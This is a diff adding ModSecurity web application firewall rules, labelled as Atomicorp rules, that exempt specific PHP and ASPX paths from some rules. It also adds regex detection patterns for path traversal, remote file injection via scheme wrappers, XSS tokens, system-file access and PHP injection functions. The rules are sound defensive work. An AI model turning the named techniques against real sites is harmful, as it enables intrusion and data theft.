+SecRule REQUEST_FILENAME "/ucp\.php" "phase:2,id:91615,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340007"
+SecAction "phase:2,id:91616,t:none,pass,nolog,skipAfter:END_RULES_91616"
+
+SecRule REQUEST_URI|ARGS|!ARGS:redirect|!ARGS:/resolution/|!ARGS:/description/|!ARGS:/comment/|!ARGS:/obrazek/|!ARGS:/txt/|!ARGS:/keywords/|!ARGS:/wysiwyg/|!ARGS:/ajax/|!ARGS:css_data|!ARGS:/text/|!ARGS:/message/|!ARGS:/body/|!ARGS:/content/|!ARGS:/html/|!ARGS:filename "(?:\x5c|(?:%(?:c(?:0%(?:9v|af)|1%1c)|2(?:5(?:2f|5c)|f)|u221[56]|1u|5c)|\/))(?:%(?:u2024|2e)|\.){2}(?:\x5c|(?:%(?:c(?:0%(?:9v|af)|1%1c)|2(?:5(?:2f|5c)|f)|u221[56]|1u|5c)|\/))"  	"phase:2,deny,log,auditlog,status:403,t:none,t:lowercase,capture,id:321464,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Generic Path Recursion denied',logdata:'%{TX.0}'"
+
+SecMarker END_RULES_91616
+
+SecRule REQUEST_FILENAME "/response_3d\.php" "phase:2,id:91617,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163,ctl:ruleRemovebyID=340151"
+SecAction "phase:2,id:91618,t:none,pass,nolog,skipAfter:END_RULES_91618"
+
+SecRule ARGS|!ARGS:config|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:/domain/|!ARGS:ResponsePath "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?)\:/"  "phase:2,deny,log,auditlog,status:403,chain,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,multimatch,id:320468,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS (modules.php)'"
+SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"
+
+SecRule ARGS|!ARGS:config|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:/domain/|!ARGS:ResponsePath "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?)\:/"  "phase:2,deny,log,auditlog,status:403,chain,t:none,t:normalisePath,t:replaceNulls,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,id:320469,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS (modules.php)'"
+SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"
+
+SecMarker END_RULES_91618
+
+SecRule REQUEST_FILENAME "/getclientpolicies\.aspx" "phase:2,id:91619,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=350149,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"
+SecAction "phase:2,id:91620,t:none,pass,nolog,skipAfter:END_RULES_91620"
+
+SecRule REQUEST_URI|ARGS|ARGS_NAMES|!ARGS:xml|!ARGS:paepdc|!ARGS:tpl_source|!ARGS:teaser_js|!ARGS:/^autoDS/|!ARGS:FrmSide|!ARGS:mainKeywords|!ARGS:/VB_announce/|!ARGS:guardar|!ARGS:/serendipity/|!ARGS:omschrijving|!ARGS:resolution|!ARGS:newyddionc|!ARGS:bericht|!ARGS:property_copy|!ARGS:/^outpay/|!ARGS:bedrijfsprofiel|!ARGS:s_query|!ARGS:finish_survey|!ARGS:photolater|!ARGS:ticket_response|!ARGS:/element/|!ARGS:option[vbpclosedreason]|!ARGS:/introduction/|!ARGS:/contenido/|!ARGS:/sql/|!ARGS:prefix|!ARGS:query|!ARGS:c_features|!ARGS:/tekst/|!ARGS:embeddump|!ARGS:other_clubs|!ARGS:/^elm/|!ARGS:/^saes/|!ARGS:dlv_instructions|!ARGS:/^cymr/|!ARGS:_qf_Register_upload|!ARGS:/^elm/|!ARGS:verbiage|!ARGS:news|!ARGS:/^wz/|!ARGS:tiny_vals|!ARGS:sSave|!ARGS:/article/|!ARGS:/about/|!ARGS:/Summarize/|!ARGS:/^product_options/|!ARGS:/SiteStructure/|!ARGS:/anmerkung/|!ARGS:/summary/|!ARGS:/edit/|!ARGS:reply|!ARGS:/story/|!ARGS:resource_box|!ARGS:navig|!ARGS:preview__hidden|!ARGS:/page/|!ARGS:order|!ARGS:/post/|!ARGS:youtube|!ARGS:reply|!ARGS:business|!ARGS:/homePage/|!ARGS:pagimenu_inhoud|!ARGS:/note/|!ARGS:Post|!ARGS:/^field_id/|!ARGS:area|!ARGS:/detail/|!ARGS:/comment/|!ARGS:LongDesc|!ARGS:/desc/|!ARGS:ta|!ARGS:/data/|!ARGS:Returnid|!ARGS:busymess|!ARGS_NAMES:/^V\*/|!ARGS_NAMES:/^S\*/|!ARGS:/^quickrise_advertise/|!ARGS:rt_xformat|!ARGS:/wysiwyg/|!ARGS:contingut|!ARGS:/^werg/|!ARGS:/body/|!ARGS:/submit/|!ARGS:/css/|!ARGS:/^section/|!ARGS:/msg/|!ARGS:t_cont|!ARGS:/^doc/|!ARGS:/xml/|!ARGS:tekst|!ARGS:formsubmit|!ARGS:invoice_snapshot|!ARGS:/code/|!ARGS:submit|!ARGS:/message/|!ARGS:/html/|!ARGS:/content/|!ARGS:/footer/|!ARGS:/header/|!ARGS:/link/|!ARGS:/text/|!ARGS:/txt/|!ARGS:/refer/|!ARGS:/referrer/|!ARGS:/template/|!ARGS:/ajax/ "(< ?(?:(?:java|vb)?script|about|applet|activex|chrome) ?>|> ?< ?(img ?src|a ?href) ?= ?(ht|f)tps?:/|\" ?> ?<|\" ?[a-z]+ ?<.*>|> ?\"? ?(>|<)|< ?/?i?frame|\%env)"          "phase:2,deny,log,auditlog,status:403,capture,t:none,t:urlDecodeUni,t:replaceNulls,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:320470,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Generic XSS filter',logdata:'%{TX.0}'"
+
+SecRule REQUEST_URI|ARGS|ARGS_NAMES|!ARGS:xml|!ARGS:paepdc|!ARGS:tpl_source|!ARGS:teaser_js|!ARGS:/^autoDS/|!ARGS:FrmSide|!ARGS:mainKeywords|!ARGS:guardar|!ARGS:/VB_announce/|!ARGS:/serendipity/|!ARGS:omschrijving|!ARGS:resolution|!ARGS:newyddionc|!ARGS:bericht|!ARGS:property_copy|!ARGS:/^outpay/|!ARGS:bedrijfsprofiel|!ARGS:s_query|!ARGS:finish_survey|!ARGS:photolater|!ARGS:/element/|!ARGS:ticket_response|!ARGS:option[vbpclosedreason]|!ARGS:embeddump|!ARGS:/introduction/|!ARGS:/contenido/|!ARGS:query|!ARGS:/sql/|!ARGS:prefix|!ARGS:c_features|!ARGS:/tekst/|!ARGS:other_clubs|!ARGS:/^elm/|!ARGS:/^saes/|!ARGS:dlv_instructions!ARGS:/^cymr/|!ARGS:_qf_Register_upload|!ARGS:verbiage|!ARGS:/^wz/|!ARGS:tiny_vals|!ARGS:sSave|!ARGS:/article/|!ARGS:/about/|!ARGS:/^elm/|!ARGS:news|!ARGS:/Summarize/|!ARGS:/^product_options/|!ARGS:/SiteStructure/|!ARGS:/anmerkung/|!ARGS:/summary/|!ARGS:/edit/|!ARGS:reply|!ARGS:/story/|!ARGS:resource_box|!ARGS:preview__hidden|!ARGS:order|!ARGS:youtube|!ARGS:/post/|!ARGS:reply|!ARGS:business|!ARGS:navig|!ARGS:pagimenu_inhoud|!ARGS:/note/|!ARGS:/page/|!ARGS:/homePage/|!ARGS:Post|!ARGS:area|!ARGS:/^field_id/|!ARGS:/detail/|!ARGS:/comment/|!ARGS:LongDesc|!ARGS:/desc/|!ARGS:ta|!ARGS:/data/|!ARGS:Returnid|!ARGS:busymess|!ARGS_NAMES:/^V\*/|!ARGS_NAMES:/^S\*/|!ARGS:/^quickrise_advertise/|!ARGS:rt_xformat|!ARGS:/wysiwyg/|!ARGS:contingut|!ARGS:/^werg/|!ARGS:/body/|!ARGS:/submit/|!ARGS:/css/|!ARGS:/^section/|!ARGS:/msg/|!ARGS:t_cont|!ARGS:/^doc/|!ARGS:/xml/|!ARGS:googlemap|!ARGS:tekst|!ARGS:formsubmit|!ARGS:invoice_snapshot|!ARGS:/code/|!ARGS:submit|!ARGS:/message/|!ARGS:/html/|!ARGS:/content/|!ARGS:/footer/|!ARGS:/header/|!ARGS:/link/|!ARGS:/text/|!ARGS:/txt/|!ARGS:/refer/|!ARGS:/referrer/|!ARGS:/template/|!ARGS:/ajax/  "(?:< ?(?:(?:img|i?frame) ?src|a ?href) ?= ?(?:ogg|tls|ssl|gopher|zlib|(ht|f)tps?)\:/|alert ?\(|<? (?:(?:java|vb)?script|applet|activex|chrome) ?>|\" ?> ?<|\" ?[a-z]+ ?<.*>|> ?\"? ?>|< ?/?i?frame|\%env)"           "phase:2,deny,log,auditlog,status:403,capture,t:none,t:urlDecodeUni,t:replaceNulls,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:320472,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Cross Site Scripting Attack',logdata:'%{TX.0}',multimatch"
+
+# Rule 340149:  XSS injection
+SecRule REQUEST_URI|ARGS|!ARGS:paepdc|!ARGS:/VB_announce/|!ARGS:xml|!ARGS:/^autoDS/|!ARGS:newyddionc|!ARGS:/serendipity/|!ARGS:omschrijving|!ARGS:resolution|!ARGS:bericht|!ARGS:property_copy|!ARGS:/^outpay/|!ARGS:s_query|!ARGS:bedrijfsprofiel|!ARGS:finish_survey|!ARGS:embeddump|!ARGS:photolater|!ARGS:/element/|!ARGS:ticket_response|!ARGS:option[vbpclosedreason]|!ARGS:/introduction/|!ARGS:/contenido/|!ARGS:/tekst/|!ARGS:/sql/|!ARGS:prefix|!ARGS:query|!ARGS:c_features|!ARGS:other_clubs|!ARGS:/^elm/|!ARGS:/^saes/|!ARGS:verbiage|!ARGS:dlv_instructions!ARGS:/^cymr/|!ARGS:_qf_Register_upload|!ARGS:/^wz/|!ARGS:tiny_vals|!ARGS:sSave|!ARGS:/article/|!ARGS:/about/|!ARGS:/^elm/|!ARGS:news|!ARGS:/Summarize/|!ARGS:usr1|!ARGS:resolution|!ARGS:problem|!ARGS:/^product_options/|!ARGS:eintrag|!ARGS:/edit/|!ARGS:/SiteStructure/|!ARGS:/anmerkung/|!ARGS:/summary/|!ARGS:Returnid|!ARGS:reply|!ARGS:/story/|!ARGS:resource_box|!ARGS:order|!ARGS:youtube|!ARGS:business|!ARGS:/homePage/|!ARGS:/post/|!ARGS:navig|!ARGS:preview__hidden|!ARGS:/page/|!ARGS:area|!ARGS:/^field_id/|!ARGS:/detail/|!ARGS:/comment/|!ARGS:LongDesc|!ARGS:meta_info|!ARGS:ta|!ARGS:/data/|!ARGS:search_theme_form_keys|ARGS_NAMES|!ARGS_NAMES:user[click_or_onmouseover]|!ARGS:busymess|!ARGS_NAMES:/^V\*/|!ARGS_NAMES:/^S\*/|!ARGS:/^quickrise_advertise/|!ARGS:rt_xformat|!ARGS:/wysiwyg/|!ARGS:contingut|!ARGS:/^werg/|!ARGS:/body/|!ARGS:/css/|!ARGS:user[usertitle]|!ARGS:/^section/|!ARGS:/msg/|!ARGS:t_cont|!ARGS:/note/|!ARGS:/xml/|!ARGS:/^doc/|!ARGS:/desc/|!ARGS:tekst|!ARGS:invoice_snapshot|!ARGS:/code/|!ARGS:/submit/|!ARGS:/message/|!ARGS:/html/|!ARGS:/content/|!ARGS:/link/|!ARGS:/text/|!ARGS:/txt/|!ARGS:/refer/|!ARGS:/referrer/|!ARGS:/template/|!ARGS:/ajax/  "(< ?(?:(?:img|i?frame) ?src|a ?href) ?= ?(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/|\" ?> ?<|(?:\.add|\@)import|asfunction\:|background-image\:|e(?:cma|xec)script|\.fromcharcode|get(?:parentfolder|specialfolder)|\.innerhtml|\< ?input|(?:java|live|j|vb)script!s|lowsrc|mocha\:|!(i|t)on(?:abort|blur|change|click!s|dragdrop|focus|keydown|keypress|keyup)|onmouse(?:down|move|out|over|up)|shell\:|window\.location|asfunction:_root\.launch|\%env)" 	"phase:2,deny,log,auditlog,status:403,capture,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:replaceNulls,t:compressWhitespace,id:320471,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Cross Site Scripting Attack',logdata:'%{TX.0}'"
+
+SecMarker END_RULES_91620
+
+SecRule REQUEST_FILENAME "/add_product\.php" "phase:2,id:91621,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163"
+SecAction "phase:2,id:91622,t:none,pass,nolog,skipAfter:END_RULES_91622"
+
+SecRule REQUEST_URI|ARGS|!ARGS:picture|!ARGS:/url/ "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"           "phase:2,deny,log,auditlog,status:403,capture,id:320572,t:none,t:normalisePath,t:replaceNulls,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,chain,rev:179,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS (AE)',logdata:'%{TX.0}'"
+SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"
+
+SecRule REQUEST_URI|ARGS|!ARGS:picture|!ARGS:/url/ "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"           "phase:2,deny,log,auditlog,status:403,id:320473,t:none,t:normalisePath,t:replaceNulls,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,capture,chain,rev:179,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS (MM)',logdata:'%{TX.0}'"
+SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"
+
+SecMarker END_RULES_91622
+
+SecRule REQUEST_FILENAME "/wp-admin/page\.php" "phase:2,id:91623,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340113,ctl:ruleRemovebyID=341211"
+
+SecRule REQUEST_FILENAME "/affiliate/scripts/server\.ph" "phase:2,id:91624,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340144"
+
+SecRule REQUEST_FILENAME "/modules/resize\.php$" "phase:2,id:91625,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340009"
+SecAction "phase:2,id:91626,t:none,pass,nolog,skipAfter:END_RULES_91626"
+
+SecRule REQUEST_HEADERS|!REQUEST_HEADERS:X-PageView|!REQUEST_HEADERS:Cookie|!REQUEST_HEADERS:REFERER|ARGS|!ARGS:g2_prefix|!ARGS:g2_form[path]|!ARGS:/keyword/|!ARGS:field_id_29|!ARGS:/highlight/|!ARGS:/search/|!ARGS:/msg/|!ARGS:/comment/|!ARGS:/hilit/|!ARGS:/uri/|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:/description/|!ARGS:product[media_gallery][images]|!ARGS:/subject/|!ARGS:/comment/|!ARGS:/content/|!ARGS:/data/|!ARGS:/txt/|!ARGS:/text/|!ARGS:/post/|!ARGS:LiveURLSegment|!ARGS:keywords|!ARGS:/wysiwyg/|!ARGS:/ajax/|!ARGS:/description/|!ARGS:note_title|!ARGS:/^xjxargs/|!ARGS:backPath|!ARGS:webpage[content]|!ARGS:article[content]|!ARGS:filecontent|!ARGS:/message/|!ARGS:/^fck_/|!ARGS:htmlSource|!ARGS:path_to_lzx|!ARGS:content|!ARGS:/body/|!ARGS:imagefile "(?:/(?:etc|proc|var/tmp|usr|opt|s?bin|dev|kern|[br]oot|sys|windows|winnt)/|(?:\/|\\\\)+inetpub|localstart\.asp|boot\.ini)" 	"phase:2,deny,log,auditlog,status:403,t:none,t:normalisePath,t:lowercase,capture,id:321486,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Protected Path Access denied in URI/ARGS', logdata:'%{TX.0}'"
+
+
+SecMarker END_RULES_91626
+
+SecRule REQUEST_FILENAME "/nota_abm\.php$" "phase:2,id:91627,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=350149,ctl:ruleRemovebyID=340148"
+
+SecRule REQUEST_FILENAME "/admin/service/producttocategory\.php" "phase:2,id:91628,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340157"
+
+SecRule REQUEST_FILENAME "/admin/moduleinterface\.php" "phase:2,id:91629,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340113,ctl:ruleRemovebyID=341211"
+
+SecRule REQUEST_FILENAME "/ajax_file_upload\.php" "phase:2,id:91630,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340006,ctl:ruleRemovebyID=340007,ctl:ruleRemovebyID=347008"
+SecAction "phase:2,id:91631,t:none,pass,nolog,skipAfter:END_RULES_91631"
+
+SecRule ARGS|!ARGS:folder|!ARGS:/description/|!ARGS:/comment/|!ARGS:obrazek|!ARGS:/txt/|!ARGS:keywords|!ARGS:/wysiwyg/|!ARGS:/ajax/|!ARGS:css_data|!ARGS:/text/|!ARGS:/message/|!ARGS:body|!ARGS:pagecontent|!ARGS:/html/|!ARGS:filecontent|!ARGS:content|!ARGS:filename|!ARGS:fck_body|!ARGS:text|!ARGS:/content/ "(?:\x5c|(?:%(?:c(?:0%(?:9v|af)|1%1c)|2(?:5(?:2f|5c)|f)|u221[56]|1u|5c)|\/))(?:%(?:u2024|2e)|\.){2}(?:\x5c|(?:%(?:c(?:0%(?:9v|af)|1%1c)|2(?:5(?:2f|5c)|f)|u221[56]|1u|5c)|\/))"  	"phase:2,deny,log,auditlog,status:403,t:none,t:lowercase,capture,id:320486,rev:2,severity:2,msg:'Atomicorp.com WAF Rules: Generic Path Recursion denied',logdata:'%{TX.0}'"
+SecRule ARGS "\.\./\.\./\.\./\.\./\.\./\.\./\.\./" 	"phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:normalisePath,id:359008,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Suspicious deep path recursion denied'"
+
+SecMarker END_RULES_91631
+
+SecRule REQUEST_FILENAME "/ajax_create_folder\.php" "phase:2,id:91632,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340006,ctl:ruleRemovebyID=340007,ctl:ruleRemovebyID=347008"
+SecAction "phase:2,id:91633,t:none,pass,nolog,skipAfter:END_RULES_91633"
+
+SecRule ARGS|!ARGS:/folder/|!ARGS:/description/|!ARGS:/comment/|!ARGS:obrazek|!ARGS:/txt/|!ARGS:keywords|!ARGS:/wysiwyg/|!ARGS:/ajax/|!ARGS:css_data|!ARGS:/text/|!ARGS:/message/|!ARGS:body|!ARGS:pagecontent|!ARGS:/html/|!ARGS:filecontent|!ARGS:content|!ARGS:filename|!ARGS:fck_body|!ARGS:text|!ARGS:/content/ "(?:\x5c|(?:%(?:c(?:0%(?:9v|af)|1%1c)|2(?:5(?:2f|5c)|f)|u221[56]|1u|5c)|\/))(?:%(?:u2024|2e)|\.){2}(?:\x5c|(?:%(?:c(?:0%(?:9v|af)|1%1c)|2(?:5(?:2f|5c)|f)|u221[56]|1u|5c)|\/))"  	"phase:2,deny,log,auditlog,status:403,t:none,t:lowercase,capture,id:320487,rev:2,severity:2,msg:'Atomicorp.com WAF Rules: Generic Path Recursion denied',logdata:'%{TX.0}'"
+SecRule ARGS "\.\./\.\./\.\./\.\./\.\./\.\./\.\./" 	"phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:normalisePath,id:359208,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Suspicious deep path recursion denied'"
+
+SecMarker END_RULES_91633
+
+SecRule REQUEST_FILENAME "/test_templates\.php" "phase:2,id:91634,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=350149,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"
+
+SecRule REQUEST_FILENAME "/phpminiadmin\.php" "phase:2,id:91635,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340144,ctl:ruleRemovebyID=340016"
+
+SecRule REQUEST_FILENAME "/webacula/restorejob/" "phase:2,id:91636,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340009"
+
+SecRule REQUEST_FILENAME "/calendar/functions/popup\.php" "phase:2,id:91637,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=390715"
+
+
+#PHP injection
+SecRule REQUEST_FILENAME|ARGS|XML:/*|!ARGS:/descripcion/|!ARGS:/text/|!ARGS:/description/|!ARGS:/resolution/|!ARGS:/message/|!ARGS:/msg/ "\b(?:f(?:tp_(?:nb_)?f?(?:ge|pu)t|get(?:s?s|c)|scanf|write|open|read)|(?:g|b)z(?:(?:encod|writ)e|compress|open|read)|s(?:ession_start|candir)|read(?:(?:(?:g|b)z)?file|dir)|move_uploaded_file|(?:proc_|bz)open|call_user_func|$_(?:(?:pos|ge)t|session))\b" "phase:2,deny,log,status:403,rev:4,capture,t:none,t:htmlEntityDecode,t:compressWhitespace,t:lowercase,ctl:auditLogParts=+E,auditlog,msg:'Atomicorp.com WAF Rules:  PHP Injection Attack',id:'390726',logdata:'%{TX.0}',severity:'2'"
+SecRule REQUEST_FILENAME "/cms/" "phase:2,id:91638,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340113,ctl:ruleRemovebyID=341211"
+SecAction "phase:2,id:91639,t:none,pass,nolog,skipAfter:END_RULES_91639"
+
+SecRule QUERY_STRING|ARGS|!ARGS:content|!ARGS:wrap|!ARGS:txtContent|!ARGS:/template/|!ARGS:text "(?i:(((url|src|href|lowsrc)[\s]*=)|(url[\s]*[\(]))[\s]*['\x22]*[\x09\x0a\x0b\x0c\x0d]*j[\x09\x0a\x0b\x0c\x0d]*a[\x09\x0a\x0b\x0c\x0d]*v[\x09\x0a\x0b\x0c\x0d]*a[\x09\x0a\x0b\x0c\x0d]*s[\x09\x0a\x0b\x0c\x0d]*c[\x09\x0a\x0b\x0c\x0d]*r[\x09\x0a\x0b\x0c\x0d]*i[\x09\x0a\x0b\x0c\x0d]*p[\x09\x0a\x0b\x0c\x0d]*t[\x09\x0a\x0b\x0c\x0d]*[\:])" 	"phase:2,deny,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,id:390727,log,auditlog,rev:4,severity:2,msg:'Atomicorp.com WAF Rules: cross site scripting stealth attempt to inject javascript ',logdata:'%{TX.0}'"
+
+SecMarker END_RULES_91639
+
+SecRule REQUEST_FILENAME "/tbl_export\.php" "phase:2,id:91640,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=344371,ctl:ruleRemovebyID=344374,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=340155,ctl:ruleRemovebyID=344367,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=340016,ctl:ruleRemovebyID=340017,ctl:ruleRemovebyID=340144,ctl:ruleRemovebyID=340145,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=331026,ctl:ruleRemovebyID=331027,ctl:ruleRemovebyID=331028,ctl:ruleRemovebyID=340146,ctl:ruleRemovebyID=340155,ctl:ruleRemovebyID=344367,ctl:ruleRemovebyID=340156,ctl:ruleRemovebyID=340157,ctl:ruleRemovebyID=340159,ctl:ruleRemovebyID=340160,ctl:ruleRemovebyID=344371,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163,ctl:ruleRemovebyID=340164,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=380019,ctl:ruleRemovebyID=380020,ctl:ruleRemovebyID=380022,ctl:ruleRemovebyID=380121,ctl:ruleRemovebyID=380122,ctl:ruleRemovebyID=380023,ctl:ruleRemovebyID=380024,ctl:ruleRemovebyID=380025,ctl:ruleRemovebyID=381025,ctl:ruleRemovebyID=380126,ctl:ruleRemovebyID=390572,ctl:ruleRemovebyID=390711"
+
+
+SecRule REQUEST_FILENAME "/import\.php" "phase:2,id:91641,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340095,ctl:ruleRemovebyID=380026,ctl:ruleRemovebyID=340157,ctl:ruleRemovebyID=380018,ctl:ruleRemovebyID=380019,ctl:ruleRemovebyID=380020,ctl:ruleRemovebyID=340128,ctl:ruleRemovebyID=340009"
+SecAction "phase:2,id:91642,t:none,pass,nolog,skipAfter:END_RULES_91642"
+
+SecRule REQUEST_HEADERS|!REQUEST_HEADERS:X-PageView|!REQUEST_HEADERS:Cookie|!REQUEST_HEADERS:REFERER|ARGS|!ARGS:/sql/|!ARGS:prefix|!ARGS:/txt/|!ARGS:/summary/|!ARGS:/text/|!ARGS:/^config/|!ARGS:/^dPcfg/|!ARGS:g2_prefix|!ARGS:g2_form[path]|!ARGS:/keyword/|!ARGS:field_id_29|!ARGS:/highlight/|!ARGS:/search/|!ARGS:/msg/|!ARGS:/comment/|!ARGS:/hilit/|!ARGS:/uri/|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:/description/|!ARGS:product[media_gallery][images]|!ARGS:/subject/|!ARGS:/comment/|!ARGS:/content/|!ARGS:/data/|!ARGS:/txt/|!ARGS:/text/|!ARGS:/post/|!ARGS:LiveURLSegment|!ARGS:keywords|!ARGS:/wysiwyg/|!ARGS:/ajax/|!ARGS:/description/|!ARGS:note_title|!ARGS:/^xjxargs/|!ARGS:backPath|!ARGS:webpage[content]|!ARGS:article[content]|!ARGS:filecontent|!ARGS:/message/|!ARGS:/^fck_/|!ARGS:htmlSource|!ARGS:path_to_lzx|!ARGS:content|!ARGS:/body/ "(?:/(?:etc|proc|var/tmp|usr|opt|s?bin|dev|tmp|kern|[br]oot|sys|windows|winnt)/|(?:\/|\\\\)+inetpub|localstart\.asp|boot\.ini)" 	"phase:2,deny,status:403,t:none,log,auditlog,t:normalisePath,capture,id:390728,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Protected Path Access denied in URI/ARGS', logdata:'%{TX.0}'"
+
+SecMarker END_RULES_91642
+
+SecRule REQUEST_FILENAME "/civicrm/admin/" "phase:2,id:91643,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340149,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148"
+
+SecRule REQUEST_FILENAME "/civicrm/report/contact/summary" "phase:2,id:91644,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340149"
+
+SecRule REQUEST_FILENAME "/instellingen\.php" "phase:2,id:91645,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163"
+SecAction "phase:2,id:91646,t:none,pass,nolog,skipAfter:END_RULES_91646"
+
+SecRule REQUEST_URI|ARGS|!ARGS:IDEAL_EMAIL "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"           "phase:2,deny,log,auditlog,status:403,capture,id:390729,t:none,t:normalisePath,t:replaceNulls,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,chain,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS (AE)',logdata:'%{TX.0}'"
+SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"
+
